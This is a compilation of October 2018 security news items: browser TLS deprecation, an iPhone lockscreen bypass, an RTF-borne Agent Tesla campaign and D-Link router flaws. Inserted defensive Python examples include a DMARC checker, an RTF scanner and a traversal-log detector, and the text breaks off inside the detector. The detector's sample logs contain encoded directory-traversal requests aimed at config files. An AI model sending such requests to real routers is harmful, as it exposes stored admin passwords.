"Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware)," Kaspersky researchers said. "Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally."


Major Browsers to Kill TLS 1.0, 1.1
18.10.2018 securityweek
Safety

All major web browsers will deprecate support for the older Transport Layer Security (TLS) 1.0 and 1.1 traffic encryption protocols in the first half of 2020.

Apple, Google, Microsoft and Mozilla on Monday announced plans to drop the protocols from their browsers to provide users with better security.

The move is not surprising, given that TLS 1.0 will turn 20 in January 2019 and TLS 1.3 is already half a year old. As for TLS 1.1, it was mainly designed to address a limitation of TLS 1.0 and prevent specific attacks that can be addressed in other ways.

“Two decades is a long time for a security technology to stand unmodified. […] vulnerable third-party implementations do exist. Moving to newer versions helps ensure a more secure Web for everyone,” Microsoft says.

Both TLS 1.0 and 1.1 are known to include weaknesses, some of which were addressed with the release of TLS 1.2 a decade ago. Despite that, however, the protocols continue to be supported by more than 70% of all websites.

“These old versions of TLS rely on MD5 and SHA-1, both now broken, and contain other flaws. TLS 1.0 is no longer PCI-DSS compliant and the TLS working group has adopted a document to deprecate TLS 1.0 and TLS 1.1,” Google notes in a blog post.

TLS 1.2, which is a prerequisite for HTTP/2, delivers significant performance improvements for the web, provides better security, and is already supported by over 94% of websites. Apple says TLS 1.2 is used in 99.6% of TLS connections made from Safari.

TLS 1.3 too is expected to soon start seeing broad adoption, so the percentage of legacy TLS connections will likely drop further.

“Additionally, we expect the IETF to formally deprecate TLS 1.0 and 1.1 later this year, at which point protocol vulnerabilities in these versions will no longer be addressed by the IETF,” Microsoft points out.

Thus, in March 2020, support for legacy TLS 1.0 and 1.1 connections will be removed in all major browsers, including Chrome, Firefox, Safari, and Microsoft’s Edge and Internet Explorer 11.

Because upgrading TLS could take a lot of time, the initial announcement is being made a year and a half before the planned deprecation to ensure that website developers have enough time to complete the transition to TLS 1.2 or newer.

“For sites that need to upgrade, the recently released TLS 1.3 includes an improved core design that has been rigorously analyzed by cryptographers. TLS 1.3 can also make connections faster than TLS 1.2,” Mozilla notes.

Only a small number of websites should be impacted by the change, and servers can enable both modern and legacy options to continue supporting legacy clients, even though that carries security risks (DROWN, FREAK, and ROBOT attacks).


New iPhone Passcode Bypass Method Found Days After Patch
18.10.2018 securityweek
Apple

A new method that can be used to bypass the iPhone lockscreen and access photos stored on the device was disclosed just days after Apple released a patch for a similar vulnerability.

In late September, iPhone enthusiast Jose Rodriguez, known for his YouTube channel videosdebarraquito, discovered yet another method for bypassing the iPhone lockscreen. The technique works on the new iPhone XS running the latest version of Apple's mobile operating system, iOS 12.

Rodriguez showed how an attacker with physical access to the targeted device could leverage a combination of Siri and the VoiceOver feature to access photos and contacts from the phone.

Apple patched the vulnerability, which it tracks as CVE-2018-4380, on October 8 with the release of iOS 12.0.1.

However, a few days later, on October 12, Rodriguez demonstrated another passcode bypass that worked on iOS 12.0.1 as well.

The newest method also involves Siri and VoiceOver, the accessibility feature that allows individuals with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The attack starts by calling the targeted device. If the phone number is not known, the attacker can have Siri read it out to them. Once the call is made, the hacker selects the Messages icon from the call screen and activates VoiceOver via Siri.

Similar to the previous passcode bypass, VoiceOver is used to navigate through hidden buttons and functions. The buttons are not visible on the screen, but VoiceOver can "see" and activate them. This allows a hacker to gain access to the Photo Library and open recent images stored there.

Compared to the previous bypass, the latest method is easier to replicate and it not only provides access to photos, but also allows the attacker to send the files to another device. In addition, the new technique poses a greater risk as the photos can be sent to a different device in full resolution – the prior hack only provided access to a smaller size preview image.

Apple will likely patch this vulnerability in an upcoming version of iOS.


Many Federal Agencies Fail to Meet DMARC Implementation Deadline
18.10.2018 securityweek
Safety

The U.S. Department of Homeland Security (DHS) last year ordered government organizations to secure their email and web assets, but many agencies have failed to meet the deadline.

The Binding Operational Directive (BOD) 18-01, issued by the DHS on October 16, 2017, instructs federal agencies to start using web and email security technologies such as HTTPS, STARTTLS, SPF and DMARC. Agencies were given one year to set their DMARC policy to “reject,” which completely blocks the delivery of unauthenticated emails.

Several cybersecurity firms have been monitoring the progress, including Agari, Valimail and Proofpoint. They all found that while significant progress has been made, there are still many agencies that are not compliant one year after the directive was issued.

Agari has been monitoring 1,144 domains and found that 851 of them, representing 74%, have implemented DMARC with a “reject” policy as dictated by BOD 18-01. The company also pointed out that of the 278 domains with no policy or a “none” policy, only 28 are defensive domains (i.e. they don’t actively send email).

There are 46 executive branch agencies that have fully implemented DMARC, and 57 that either have no DMARC record or still have a “none” policy. A majority of the organizations that failed to become compliant only have one or two domains, Agari said.

“BOD 18-01 has clearly made a positive impact on the cybersecurity posture of the United States government,” commented Agari’s Fareed Bukhari. “It’s really great to see such a dramatic increase in adoption in such a short time frame. This is the fastest and most complete adoption of the DMARC standard for any industry in history. Private enterprise is definitely lagging behind the public sector now.”

Proofpoint has monitored 1,311 domains, including federal civilian domains, and its analysis also took into account the implementation of the Sender Policy Framework (SPF), which along with DomainKeys Identified Mail (DKIM) forms the foundation of DMARC. BOD 18-01 also requires the implementation of SPF.

Data collected by Proofpoint shows that over 60% of .gov domains are compliant with the BOD. Of all the organizations, 56% have implemented DMARC themselves and 21% have contracted the services of specialized providers.

BOD 18-01 deadline

“While not every agency is DMARC compliant with BOD 18-01 at the deadline, the progress made over the past year is commendable. Ideally, we will continue to see this positive trend until each agency fully protects their domains from email spoofing attacks. And while it is nice to see other industry groups taking a similar stance with DMARC authentication, BOD 18-01 has been a promising step in the right direction that organizations in all industries should follow,” explained Robert Holmes, vice president of Email Security at Proofpoint.

Valimail, which published its report one week before the deadline, noted that half of the 1,315 .gov domains it was monitoring had been compliant with BOD 18-01.

The company pointed out that 63 percent of compliant domains were not actually used for email. It also noted that DMARC records are not present on a vast majority of military domains, but these are not covered by the DHS directive, which exempts the Department of Defense, the intelligence community and national security systems.
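The directive's compliance test is the `p=` tag of the DMARC record published at `_dmarc.<domain>`: only `p=reject` counts, while a missing record or `p=none` does not. The following checker is an added example written for this article, not code from Agari, Valimail, Proofpoint or DHS. It parses DMARC TXT records, classifies each domain the way the monitoring reports above do, and goes one step beyond the article by also flagging records that say `p=reject` but weaken it with a laxer `sp=` subdomain policy or a `pct=` below 100. The records and domain names are constructed; a real run would fetch the TXT records with a DNS library first.

```python
"""Classify published DMARC records against the BOD 18-01 target policy (p=reject).

Added example; the records and domain names below are constructed, not real agencies.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed TXT records as they would be published at _dmarc.<domain>.
# None models a domain with no DMARC record at all.
SAMPLE_TXT: Dict[str, Optional[str]] = {
    "agency-a.example": "v=DMARC1; p=reject; rua=mailto:dmarc@agency-a.example",
    "agency-b.example": "v=DMARC1; p=none; rua=mailto:dmarc@agency-b.example",
    "agency-c.example": "v=DMARC1; p=quarantine; pct=50",
    "agency-d.example": "v=DMARC1; p=reject; sp=none",
    "agency-e.example": "v=spf1 -all",
    "agency-f.example": None,
}


@dataclass
class DmarcResult:
    domain: str
    policy: Optional[str]
    subdomain_policy: Optional[str]
    pct: int
    status: str  # reject | reject-weakened | quarantine | none | missing | invalid


def parse_dmarc(txt: str) -> Optional[Dict[str, str]]:
    """Split a DMARC record into its tag=value pairs; None if it is not a DMARC record."""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            return None
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    keys = list(tags)
    # RFC 7489: "v=DMARC1" must come first and "p" is mandatory.
    if not keys or keys[0] != "v" or tags["v"].upper() != "DMARC1" or "p" not in tags:
        return None
    return tags


def evaluate(domain: str, txt: Optional[str]) -> DmarcResult:
    """Map one domain's record to a compliance status."""
    if txt is None:
        return DmarcResult(domain, None, None, 0, "missing")
    tags = parse_dmarc(txt)
    if tags is None:
        return DmarcResult(domain, None, None, 0, "invalid")
    policy = tags["p"].lower()
    subdomain_policy = tags.get("sp", policy).lower()  # sp defaults to p
    pct_raw = tags.get("pct", "100")
    pct = int(pct_raw) if pct_raw.isdigit() else 100  # pct defaults to 100
    if policy == "reject" and subdomain_policy == "reject" and pct == 100:
        status = "reject"
    elif policy == "reject":
        # p=reject on the organisational domain, but sp= or pct<100 leaves a gap.
        status = "reject-weakened"
    elif policy in ("quarantine", "none"):
        status = policy
    else:
        status = "invalid"
    return DmarcResult(domain, policy, subdomain_policy, pct, status)


def compliance_summary(records: Dict[str, Optional[str]]) -> Dict[str, object]:
    """Aggregate results the way the monitoring reports in the article do."""
    results = [evaluate(domain, txt) for domain, txt in records.items()]
    by_status = Counter(r.status for r in results)
    total = len(results)
    compliant = by_status["reject"]
    return {
        "total": total,
        "reject": compliant,
        "percent_reject": round(100 * compliant / total) if total else 0,
        "by_status": dict(by_status),
    }


if __name__ == "__main__":
    for domain, txt in SAMPLE_TXT.items():
        print(evaluate(domain, txt))
    print(compliance_summary(SAMPLE_TXT))
```

The `reject-weakened` class is worth reporting separately: a domain with `p=reject; sp=none` will be counted as compliant by a scan that only reads `p=`, yet mail spoofed from any subdomain still passes.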


Chef Launches New Version for DevSecOps Automated Compliance
18.10.2018 securityweek
Safety

Chef Software has announced the latest version of its InSpec compliance automation platform for DevSecOps. InSpec provides an open source high-level language to share security and compliance rules between development, security, and operations engineers. Compliance can be with internal security policy, infrastructure provisioning, and external regulatory requirements.

InSpec allows security and compliance requirements to be expressed in a common language for all groups. So, if the security group specifies that an application requires a mandatory access control system, this can be added to InSpec as a few lines of simple code. As the development proceeds, InSpec checks that all such specified requirements are included within the application.

"Due to the human-readable way InSpec code is written, we've had success getting buy-in from the non-technical decision makers, which has been crucial in supporting our transformation efforts," comments Hans Nesbitt, cloud engineer at Pacific Life.

Where there are external regulatory requirements, the method of fulfillment can be specified in the same high-level language, and the platform will check for its inclusion within the application as development proceeds. InSpec does not tell the development team how to conform to any particular requirement -- such as GDPR or PCI -- but ensures that the chosen method of compliance specified by the security team is included within the final product. This is done continuously throughout the development cycle to ensure that security is built into the product rather than added at the end.

"With InSpec as an integral part of our pipeline, explains Keith Walters, director of partner solutions for TapHere! Technology, "we are able to automatically test for security and compliance throughout the development process. The detailed visibility into our systems that InSpec provides enables us to drive towards an Automated ATO (Authority to Operate), or approval to push live. This accelerates how we deliver mission capabilities to our citizens and service members while adhering to our security requirements."

InSpec 3.0 adds a new plugin architecture; improved exception management; compliance with Hashicorp Terraform and Google Cloud Platform (GCP); and improved metadata.

The plugin architecture makes it easier for developers to extend their use of InSpec. Within InSpec itself, it allows new custom resources to be added. Via Train (the TRAnsport INterface library), it extends coverage to new device types and clouds, such as Digital Ocean and Alibaba. It also extends InSpec's compliance capabilities with native support for GCP.

"InSpec," says Nesbitt, "has helped us break down silos between the application developers, operations and security teams as we migrate to the cloud. It gives everyone confidence that we can automatically deploy and maintain infrastructure as code in a transparent, repeatable, and secure way."

The improved exception management allows InSpec controls to be skipped on nodes where they are unnecessary or not applicable. This could include specific devices that have the specified controls already built in; cases where the controls are not needed, perhaps because the device is air-gapped; or cases where adding the controls could interfere with delicate operations and their exclusion is defined as an acceptable risk.

Integration with Terraform has two primary components: 'Provisioning' runs InSpec tests after a 'terraform apply' operation for servers and clouds; and an InSpec Generator (known as 'Iggy') generates a starter set of InSpec controls by parsing an existing Terraform state file. "This is a big deal," adds Nesbitt, "because we will catch and prevent deployment of non-compliant infrastructure, which saves costs and enhances security."

The improved metadata on controls introduces a key-value description interface that allows more fine-grained reporting, and de-duplication of controls that satisfy one or more compliance regimes. For example, users can create custom metadata categories such as what compliance regime the control is for, and how to remediate or escalate the findings.

The difficulty tackled by InSpec is the maintenance of compliance across rapidly evolving hybrid IT strategies and ever-changing regulatory requirements. "InSpec 3.0," says Corey Scobie, SVP of product and engineering at Chef, "eases the path to compliance for both developers and operations teams, and helps accelerate enterprises' digital transformations by laying a solid foundation for cloud migration."


Malicious RTF Documents Deliver Information Stealers
18.10.2018 securityweek
Virus

A newly discovered infection campaign is leveraging malicious RTF files to deliver information-stealing Trojans to the unsuspecting victims, Cisco Talos security researchers warn.

As part of the attacks, the adversaries use a well-known exploit chain for malware delivery, but have modified it so it would not trigger anti-virus detection. The final payload in this campaign was the Agent Tesla Trojan, along with other malware families, including the Loki information stealer.

The malicious documents used in this operation abuse the CVE-2017-11882 vulnerability that Microsoft patched a year ago to deliver the Agent Tesla and Loki stealers. The same infrastructure, the security researchers discovered, is also being used for the distribution of other malware families, such as Gamarue.

The RTF file delivering Agent Tesla had almost no detections on the multi-engine antivirus scanning website VirusTotal at the time of analysis, Cisco reveals.

The infection chain abuses the vulnerable Equation Editor component of Office to download a file and create the scvhost.exe process, which in turn creates another instance of itself. Next, typical command and control (C&C) traffic is observed.

Although macro language is not supported in RTF files, Microsoft Object Linking and Embedding (OLE) objects and Macintosh Edition Manager subscriber objects are. Thus, attackers can embed objects into the RTF to leverage the Equation Editor via OLE functions, and can also apply a high level of obfuscation to the document itself to avoid detection.
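Because the Equation Editor is reached through an OLE object rather than a macro, a mail gateway or analyst can triage an RTF statically by looking at what the `\object` groups declare and at the class name inside the hex-encoded `\objdata` stream, even when the document is obfuscated as described above. The scanner below is an added example written for this article, not Cisco Talos code: it strips the padding and bogus control words that obfuscated samples insert into `\objdata`, decodes the hex, and reports Equation Editor indicators (the `Equation.3` ProgID, its CLSID, or the class name in the OLE1 header) plus `\objupdate`, which forces the object to activate on open. The three sample documents are constructed and contain only an OLE1 header naming the class, no payload.

```python
"""Static triage of RTF files for embedded Equation Editor (Equation.3) OLE objects.

Added example: it flags indicators of the delivery technique described in the
article and does not parse or execute any object. Sample documents are constructed.
"""
import re
import uuid
from typing import Dict, List

# ProgID and CLSID of Microsoft Equation 3.0, the Equation Editor OLE server.
EQUATION_PROGID = "Equation.3"
EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")

OBJCLASS_RE = re.compile(r"\\objclass\s+([^{}\\;]+)")
OBJDATA_RE = re.compile(r"\\objdata\b(.*?)}", re.DOTALL)
OBJUPDATE_RE = re.compile(r"\\objupdate\b")
# RTF control words (\word, \word123, \word-12) and the \* ignorable marker.
CONTROL_RE = re.compile(r"\\[a-zA-Z]+-?\d*|\\\*")


def decode_objdata(raw: str) -> bytes:
    """Recover the OLE1 bytes from an \\objdata group.

    Obfuscated samples pad the hex with whitespace and bogus control words;
    both are stripped, and anything that is not a hex digit is dropped."""
    cleaned = CONTROL_RE.sub("", raw)
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", cleaned)
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    return bytes.fromhex(hexdigits)


def scan_rtf(text: str) -> Dict[str, object]:
    """Return the Equation Editor indicators found in an RTF document."""
    findings: List[str] = []
    for cls in OBJCLASS_RE.findall(text):
        if "equation" in cls.lower():
            findings.append("objclass:" + cls.strip())
    for raw in OBJDATA_RE.findall(text):
        blob = decode_objdata(raw)
        # The OLE1 header names the class in ASCII even when \objclass is omitted.
        if b"equation" in blob.lower() or b"eqnedt32" in blob.lower():
            findings.append("objdata:equation-editor-class-name")
        if EQUATION_CLSID.bytes_le in blob:
            findings.append("objdata:equation-editor-clsid")
    if OBJUPDATE_RE.search(text):
        findings.append("objupdate")  # forces activation on open; weak on its own
    suspicious = any(not f.startswith("objupdate") for f in findings)
    return {"findings": findings, "suspicious": suspicious}


# Constructed samples. The OLE1 data is just a header naming the class; no payload.
SAMPLE_EQUATION_RTF = (
    r"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}"
    r"{\*\objdata 01050000020000000b0000004571756174696f6e2e3300}}}"
)
# No \objclass, junk control words and whitespace inside the hex, \objupdate set.
SAMPLE_OBFUSCATED_RTF = (
    r"{\rtf1\ansi{\object\objautlink\objupdate"
    r"{\*\objdata \v 0105\b0  0000 \i 0200 0000\i0 0b00 0000 "
    r"4571 7561 7469 6F6E 2E33 00}}}"
)
SAMPLE_BENIGN_RTF = (
    r"{\rtf1\ansi{\object\objemb{\*\objclass Word.Document.8}"
    r"{\*\objdata 01050000020000000f000000576f72642e446f63756d656e742e3800}}}"
)

if __name__ == "__main__":
    for name, doc in [("equation", SAMPLE_EQUATION_RTF),
                      ("obfuscated", SAMPLE_OBFUSCATED_RTF),
                      ("benign", SAMPLE_BENIGN_RTF)]:
        print(name, scan_rtf(doc))
```

A match is a reason to detonate or block the file, not proof of exploitation: legitimate documents can embed Equation.3 objects, which is exactly why signature engines that key on the object class alone produced the near-zero VirusTotal detections mentioned above.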

“We have also seen several other campaigns using the exact same infection chain, but delivering Loki as the final payload,” Cisco explains.

The Agent Tesla Trojan was designed not only with information stealing capabilities, but also with the ability to download additional malware onto the compromised machines. The threat is being sold by a company offering grayware products, which claims that the program was designed for password recovery and child monitoring.

However, the malware can steal passwords from more than 25 common applications and also includes a series of rootkit functions, such as keylogging, clipboard stealing, screenshot capturing, and webcam access.

For password theft, the malware targets applications such as Chrome, Firefox, Internet Explorer, Yandex, Opera, Outlook, Thunderbird, IncrediMail, Eudora, FileZilla, WinSCP, FTP Navigator, Paltalk, Internet Download Manager, JDownloader, Apple keychain, SeaMonkey, Comodo Dragon, Flock, and DynDNS, among others.

The malware also includes support for SMTP, FTP and HTTP exfiltration, yet it is only using the HTTP POST method. Data is sent encrypted to the C&C.

“The actor behind this malware used the RTF standard because of its complexity, and used a modified exploit of a Microsoft Office vulnerability to download Agent Tesla and other malware. It is not completely clear if the actor changed the exploit manually, or if they used a tool to produce the shellcode,” Cisco concludes.


Utimaco's Acquisition of Atalla HSM Product Line Gets Regulatory Clearance
18.10.2018 securityweek
Safety

Aachen, Germany-based Utimaco has received U.S. regulatory clearance for the acquisition of the Atalla product lines from Micro Focus it first announced in May 2018. The transaction is now scheduled to close on November 5, 2018.

Both Utimaco and Atalla are leaders in hardware security modules (HSMs), but while Utimaco has concentrated on general-purpose HSMs, Atalla has majored on payment HSMs. Utimaco's intention is to combine all HSM requirements into a single common platform for general purpose and payment purposes. "The traditional separation between 'payment HSM' and 'general purpose HSM' will eventually cease to exist, which is why our goal is to focus on innovation and invest in building one common platform for payment and general purpose HSM customers," explains Utimaco CEO, Malte Pollmann.

Atalla's HSM is a payments hardware module used for protecting sensitive data and associated keys for non-cash retail payment transactions, cardholder authentication and cryptographic keys. What is required, added Pollmann, is a single platform "providing the product in all required form factors: PCI, LAN and Cloud."

The underlying driver is accelerating digital transformation fueled by mobile, cloud, blockchain and new regulations. As a result, says Utimaco, financial institutions and service providers of all sizes need out-of-the-box, proven and reliable technology to seamlessly interface with current payment infrastructures, while still enabling them to easily drive and adapt to the next generation of innovative services.

Utimaco already has a payments offering in its existing PaymentServer Line. This gained PCI PTS HSM V2 accreditation in October 2017, allowing customers to meet PCI Data Security Standard (PCI DSS), PCI Point-to-Point Encryption (PCI P2PE), and even PCI HSM compliance as a delta certification with custom code running on the HSM.

The Atalla product line is seen as complementary to Utimaco's general purpose (SecurityServer) and payment (PaymentServer) lines. SecurityServer is certified to FIPS 140-2 Level 3 and physical Level 4, and this year gained Common Criteria (CC) certification for the CP5 product line.

The acquisition, said Pollmann, "is a significant milestone, and we look forward to bringing the Atalla team under the information security umbrella of Utimaco. After several changes of ownership, we are happy to offer Atalla a long-term home in our HSM and information security business."

Micro Focus acquired Atalla after HPE CEO Meg Whitman announced, in September 2016, that it would be spun out and then merged with Micro Focus.

Market Research Future forecast this month that the global HSM market would grow at an annual 13% rate to reach $1.115 billion in 2022. With the added momentum in the payments segment from Atalla (Utimaco is already the world's second largest provider of HSMs), the firm is staking its claim for a sizable portion of that market.

Utimaco was acquired by Sophos in 2009. One year later, Sophos sold a majority interest to Apax Partners, and this was followed by a management buyout in 2013. Today, Utimaco's primary investors are EQT, PINOVA Capital and BIP Investment Partners S.A.


Insurer Anthem Will Pay Record $16M for Massive Data Breach
18.10.2018 securityweek
Incident

The nation's second-largest health insurer has agreed to pay the government a record $16 million to settle potential privacy violations in the biggest known health care hack in U.S. history, officials said Monday.

The personal information of nearly 79 million people — including names, birthdates, Social Security numbers and medical IDs — was exposed in the cyberattack, discovered by the company in 2015.

The settlement between Anthem Inc. and the Department of Health and Human Services represents the largest amount collected by the agency in a health care data breach, officials said.

"When you have large breaches it erodes people's confidence in the privacy of their sensitive information, and we believe such a large breach of trust merits a substantial payment," said Roger Severino, director of the HHS Office for Civil Rights. The office also enforces the federal health care privacy law known as HIPAA, or the Health Insurance Portability and Accountability Act.

Severino said the Anthem settlement is nearly three times larger than the previous record amount paid to the government in a privacy case. That sends a message to the industry that "hackers are out there always and large health care entities in particular are targets," he added.

The Blue Cross-Blue Shield insurer also agreed to a corrective action plan under government monitoring, which involves a process for the company to assess its electronic security risks, take appropriate countermeasures and maintain ongoing surveillance.

Indianapolis-based Anthem covers more than 40 million people and sells individual and employer coverage in key markets like New York and California. The payment is in lieu of civil penalties that HHS may have imposed. Anthem admitted no liability. The civil case involving privacy laws is separate from any other investigation the government may be pursuing.

In a statement Monday, Anthem said it's not aware of any fraud or identity theft stemming from the breach. The company provided credit monitoring and identity theft insurance to all customers potentially affected.

"Anthem takes the security of its data and the personal information of consumers very seriously," the statement said. "We have cooperated with (the government) throughout their review and have now reached a mutually acceptable resolution."

The company discovered the data breach in early 2015, but hackers had been burrowing into its systems for weeks. Security experts said at the time that the size and scope of the attack indicated potential involvement by a foreign government.

Hackers used a common email technique called spear-phishing in which unwitting company insiders are tricked into revealing usernames and passwords. The Anthem attackers gained the credentials of system administrators, allowing them to probe deeply into the insurer's systems.

HHS said its investigation found that Anthem had failed to deploy adequate measures for countering hackers. The company lacked an enterprisewide risk analysis, had insufficient procedures to monitor activity on its systems, failed to identify and respond to suspected or known security incidents, and did not implement "adequate minimum access controls" to shut down intrusions from as early as February 2014.


VMware Patches Code Execution Flaw in Virtual Graphics Card
18.10.2018 securityweek
Vulnerability

VMware has patched a critical arbitrary code execution vulnerability in the SVGA virtual graphics card used by its Workstation, ESXi and Fusion products.

According to an advisory published by the company on Tuesday, ESXi, Fusion and Workstation are affected by an out-of-bounds read vulnerability in the SVGA device. The flaw, tracked as CVE-2018-6974, can be exploited by a malicious guest to execute arbitrary code on the host.

The vulnerability was reported to VMware by an anonymous researcher through Trend Micro’s Zero Day Initiative (ZDI).

ZDI’s own advisory describes the security hole as a heap-based buffer overflow that allows a local attacker with low privileges on the system to escalate permissions and execute arbitrary code. ZDI revealed that the flaw was reported to VMware in mid-June.

“The specific flaw exists within the handling of virtualized SVGA,” ZDI said. “The issue results from the lack of proper validation of user-supplied data, which can result in an overflow of a heap-based buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

The same anonymous researcher likely also reported CVE-2018-6973, an out-of-bounds write vulnerability in the e1000 virtual network adapter used by Workstation and Fusion. This flaw also allows arbitrary code execution on the host and it was reported to VMware through ZDI on the same day as CVE-2018-6974. However, VMware resolved this vulnerability with patches released in mid-August.

Exploiting this security hole also requires at least low-privileged access to the targeted system.

While VMware has classified both vulnerabilities as “critical,” ZDI has assigned them a CVSS score of 6.9, which makes them “medium” severity.

Earlier this month, VMware also patched an “important” denial-of-service (DoS) bug discovered by Cisco Talos researchers in Workstation, ESXi and Fusion, and a serious SAML authentication bypass vulnerability in the Workspace ONE Unified Endpoint Management Console.


Oracle's October 2018 Update Includes 301 Security Fixes
18.10.2018 securityweek
Vulnerability

Oracle’s October 2018 Critical Patch Update (CPU) was rolled out on Tuesday with 301 security fixes, bringing the total of patches released this year to 1,119.

The enterprise software giant addressed bugs in 23 products this month, including Database Server, Communications Applications, Construction and Engineering Suite, E-Business Suite, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft, and Retail Applications.

Of the vulnerabilities addressed with the latest CPU, over 60% were remotely exploitable without authentication. One in six vulnerabilities had a CVSS score of 9.0 or above, and 162 vulnerabilities were addressed in business-critical applications, Oracle’s advisory reveals.

Fusion Middleware was the most impacted Oracle product this month. It received 65 security fixes and 56 of the addressed vulnerabilities could be exploited remotely without authentication.

MySQL saw 38 security fixes (3 remotely exploitable flaws), Retail Applications received 31 patches (21 remotely exploitable vulnerabilities), PeopleSoft 24 (21 remotely exploitable), Sun Systems Products Suite 19 (9 remotely exploitable), E-Business Suite 16 (14 remotely exploitable), while Communications Applications received 14 patches (9 remotely exploitable), the same as Virtualization (only 1 remotely exploitable).

Java SE (12 patches), Construction and Engineering Suite (10 fixes), Hospitality Applications (9), Hyperion (9), Database Server (7), JD Edwards Products (6), Supply Chain Products Suite (6), Insurance Applications (5), Enterprise Manager Products Suite (4), Food and Beverage Applications (4), Siebel CRM (3), Financial Services Applications (2), iLearning (1), Health Sciences Applications (1), and Support Tools (1) were also affected by vulnerabilities.

Oracle this month addressed a critical issue in GoldenGate (CVE-2018-2913 – CVSS Base Score: 10.0). Easily exploitable, the vulnerability could allow an unauthenticated attacker with network access via TCP to compromise and take over GoldenGate.

Other important vulnerabilities resolved with the October 2018 CPU include CVE-2018-3259, which impacts Database Server; CVE-2018-1275, affecting Fusion Middleware; CVE-2018-7489, impacting JD Edwards Products; and CVE-2018-11776, affecting MySQL. All of these flaws have a CVSS score of 9.8.

At 301, this month’s CPU is the second largest for 2018, after July’s CPU. At 1,119, the total number of vulnerabilities addressed this year, however, is the same as that registered last year, as ERPScan, a company that specializes in securing Oracle and SAP applications, points out.

Over the past five years, the number of patches released by Oracle each year nearly tripled (it was 430 in 2013).

“The fact that Oracle has 430,000 applications customers from the wide range of industries in 175 countries makes it of the utmost importance to apply the released security patches,” ERPScan notes.


Critical Vulnerabilities Allow Takeover of D-Link Routers
18.10.2018 securityweek
Vulnerability

Researchers have found several vulnerabilities that can be exploited to take full control of some D-Link routers, and patches do not appear to be available. Serious flaws have also been discovered in routers from Linksys.

The security holes affecting D-Link devices were discovered by a research team at the Silesian University of Technology in Poland. The bugs impact the httpd server of several D-Link routers, including DWR-116, DWR-111, DIR-140L, DIR-640L, DWR-512, DWR-712, DWR-912, and DWR-921.

One of the vulnerabilities, tracked as CVE-2018-10822, is a directory traversal issue that allows remote attackers to read arbitrary files using a simple HTTP request. The vulnerability was previously reported to D-Link and tracked as CVE-2017-6190, but the vendor failed to address it in many of its products.

This flaw can be exploited to gain access to a file that stores the device's admin password in clear text. The storage of passwords in clear text is the second vulnerability, identified as CVE-2018-10824.

Since this security hole poses a serious risk and is easy to exploit, the researchers have not disclosed the exact location of the file storing the admin passwords.

Once authenticated, an attacker can exploit a third vulnerability, tracked as CVE-2018-10823, to execute arbitrary commands and take full control of the device. A video shows how exploitation works:

D-Link was notified of the vulnerabilities back in May and it promised to release a patch for DWR-116 and DWR-111 devices, along with a security alert for products that have reached end of life. However, no patches appear to have been released to date and the researchers have decided to make their findings public.

SecurityWeek has reached out to D-Link for comment and will update this article if the company responds.

In the meantime, the security holes can be mitigated by ensuring that the router is not accessible from the Internet.
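Where the management interface cannot be taken off the Internet immediately, the next best control is to watch the router's (or an upstream proxy's) access log for the request pattern behind CVE-2018-10822. The detector below is an added example written for this article, not code from the Silesian University researchers or D-Link. It normalises each request target, undoing percent-encoding, double encoding and the overlong UTF-8 forms that are used to slip `../` past naive filters, and reports the client addresses that asked for a path containing a `..` segment. The log lines are constructed in the common "combined" format, with addresses from documentation ranges.

```python
"""Flag directory-traversal requests in web-server access logs, including
percent-encoded and double-encoded forms.

Added example for this article; the log lines are constructed and the addresses
come from documentation ranges.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [18/Oct/2018:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.55 - - [18/Oct/2018:10:01:05 +0000] "GET /cgi-bin/../../config.txt HTTP/1.1" 200 1024 "-" "curl/7.61.0"
198.51.100.7 - - [18/Oct/2018:10:02:11 +0000] "GET /%2e%2e/%2e%2e/config.txt HTTP/1.1" 404 231 "-" "curl/7.61.0"
198.51.100.7 - - [18/Oct/2018:10:02:12 +0000] "GET /images/%252e%252e%252fconfig.txt HTTP/1.1" 200 800 "-" "curl/7.61.0"
192.0.2.10 - - [18/Oct/2018:10:02:40 +0000] "GET /docs/..notes/readme HTTP/1.1" 200 100 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Oct/2018:10:03:00 +0000] "GET /static/..%c0%af..%c0%afconfig.txt HTTP/1.1" 200 700 "-" "python-requests/2.19"
"""

# Apache/nginx "combined" log format; only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path segment: preceded by start-of-string or "/", followed by "/" or end.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")


def normalize_target(target: str) -> str:
    """Undo the encodings attackers use to hide "../" from naive filters."""
    path = target
    for _ in range(4):  # bounded: stop once decoding no longer changes anything
        step = re.sub(r"%c0%ae", ".", path, flags=re.IGNORECASE)  # overlong UTF-8 "."
        step = re.sub(r"%c0%af|%c1%9c", "/", step, flags=re.IGNORECASE)  # overlong "/" and "\"
        step = unquote(step)
        if step == path:
            break
        path = step
    return path.replace("\\", "/")


def is_traversal(target: str) -> bool:
    """True when the request target contains a ".." segment after normalisation.
    The query string is deliberately kept: file= style parameters are a common vector."""
    return TRAVERSAL_RE.search(normalize_target(target)) is not None


def scan_access_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, raw_target) for every request that looks like traversal."""
    hits: List[Tuple[str, str]] = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
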